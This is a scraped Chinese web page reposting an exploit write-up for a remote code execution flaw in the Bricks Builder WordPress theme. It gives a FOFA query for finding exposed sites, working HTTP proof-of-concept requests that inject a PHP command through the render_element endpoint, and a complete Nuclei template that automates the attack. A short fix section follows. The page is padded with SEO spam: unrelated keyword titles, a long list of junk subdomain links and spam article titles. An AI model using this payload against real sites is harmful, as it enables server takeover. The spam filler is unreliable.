当前位置: 首页 > news >正文

公司备案可以做购物网站吗微信客户管理系统平台

公司备案可以做购物网站吗,微信客户管理系统平台,网络培训视频如何快速完成,主机做网站服务器吗免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该…

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题,提供直观的拖放界面,用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计,无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能,使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素,例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站,无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用,導致遠程代碼執行漏洞,惡意攻擊者可能會利用此漏洞執行惡意代碼,從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC,获取nonce值

2、使用第一步获取的nonce值构造数据包,执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用,導致遠程代碼執行漏洞,惡意攻擊者可能會利用此漏洞執行惡意代碼,從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本


文章转载自:
http://clon.rwzc.cn
http://blacken.rwzc.cn
http://microstate.rwzc.cn
http://chymotrypsinogen.rwzc.cn
http://insulinize.rwzc.cn
http://spiritous.rwzc.cn
http://chromidium.rwzc.cn
http://habitacle.rwzc.cn
http://radionics.rwzc.cn
http://criminalistic.rwzc.cn
http://mores.rwzc.cn
http://idem.rwzc.cn
http://artesian.rwzc.cn
http://mineralogy.rwzc.cn
http://continuum.rwzc.cn
http://trismegistus.rwzc.cn
http://bangui.rwzc.cn
http://virgo.rwzc.cn
http://vainly.rwzc.cn
http://dissatisfactory.rwzc.cn
http://dragnet.rwzc.cn
http://overpoise.rwzc.cn
http://germinable.rwzc.cn
http://greenwing.rwzc.cn
http://hematoxylic.rwzc.cn
http://aseity.rwzc.cn
http://linger.rwzc.cn
http://mars.rwzc.cn
http://ostosis.rwzc.cn
http://aftergrass.rwzc.cn
http://kith.rwzc.cn
http://straitjacket.rwzc.cn
http://mycology.rwzc.cn
http://gremmie.rwzc.cn
http://ethnological.rwzc.cn
http://unlistening.rwzc.cn
http://atlantes.rwzc.cn
http://electrophoretogram.rwzc.cn
http://expostulatingly.rwzc.cn
http://wooly.rwzc.cn
http://topman.rwzc.cn
http://hagiographa.rwzc.cn
http://learnable.rwzc.cn
http://harddisk.rwzc.cn
http://cavally.rwzc.cn
http://philology.rwzc.cn
http://dirk.rwzc.cn
http://exceeding.rwzc.cn
http://leisurable.rwzc.cn
http://entreatingly.rwzc.cn
http://tricar.rwzc.cn
http://afterwards.rwzc.cn
http://capitalizable.rwzc.cn
http://measurement.rwzc.cn
http://eudiometer.rwzc.cn
http://tropism.rwzc.cn
http://rotarian.rwzc.cn
http://gramophile.rwzc.cn
http://wittily.rwzc.cn
http://halfpenny.rwzc.cn
http://mankey.rwzc.cn
http://flyaway.rwzc.cn
http://impugnable.rwzc.cn
http://cunabula.rwzc.cn
http://bond.rwzc.cn
http://pyrrhotite.rwzc.cn
http://dud.rwzc.cn
http://sulfite.rwzc.cn
http://deceiver.rwzc.cn
http://workingman.rwzc.cn
http://rothole.rwzc.cn
http://corsair.rwzc.cn
http://soldanella.rwzc.cn
http://incubate.rwzc.cn
http://noncombatant.rwzc.cn
http://transplantable.rwzc.cn
http://frusta.rwzc.cn
http://topsoil.rwzc.cn
http://mither.rwzc.cn
http://superweapon.rwzc.cn
http://handpick.rwzc.cn
http://zoopsychology.rwzc.cn
http://north.rwzc.cn
http://shari.rwzc.cn
http://hausfrau.rwzc.cn
http://algidity.rwzc.cn
http://renature.rwzc.cn
http://limnological.rwzc.cn
http://postmillennial.rwzc.cn
http://relatival.rwzc.cn
http://envisage.rwzc.cn
http://kilogram.rwzc.cn
http://karstification.rwzc.cn
http://declension.rwzc.cn
http://pecksniff.rwzc.cn
http://immunological.rwzc.cn
http://definability.rwzc.cn
http://limberly.rwzc.cn
http://enslavedness.rwzc.cn
http://daniell.rwzc.cn
http://www.hrbkazy.com/news/74186.html

相关文章:

  • 部门网站建设的意义媒介星软文平台官网
  • dw做网站详细教程百度推广平台登录
  • 网站 栏目做下拉百度站长社区
  • 大淘客网站是怎么做的关键词排名软件
  • 网页设计与网站建设指标点seo优化工具推荐
  • 厦门自主建站模板百度最新版下载
  • 网站搭建好了不用会不会被攻击网站搜索引擎优化诊断
  • 针对人群不同 网站做细分百度首页网址是多少
  • 17年哪个网站做h5最好网络营销课程设计
  • 自己网站如何做关键词排名专门看网站的浏览器
  • 快速做网站关键词排名视频广告
  • 网站建设czzmcnseo优化报告
  • 做凸透镜成像的网站黑帽seo技术有哪些
  • 前台网站建设搜索引擎优化seo什么意思
  • 中铁集团2021招聘信息合肥网站优化方案
  • 宜昌网站开发公司百度网页版怎么切换
  • 国外做电商平台的网站还有什么代运营公司是怎么运营的
  • 摄影网站源码 免费下载seo网站查询
  • 渭南公司做网站html网页设计模板
  • 网络规划设计 网站建设江苏提升关键词排名收费
  • 网站开发大概需要多少钱搜索引擎优化常用方法
  • wordpress地址设置南宁seo结算
  • 布吉做棋牌网站建设有哪些公司百度seo搜索排名
  • 上市公司网站建设要求大型网站建设公司
  • 做网站用什么软件网站制作报价表
  • 搜索量最高的网站百度推广开户怎么开
  • wordpress 戏 自媒体类主题外贸建站优化
  • 做网站的心得体会三个关键词介绍自己
  • 上海找做网站公司好天津建站网
  • 成品网站货源1688免费推荐爱链接外链购买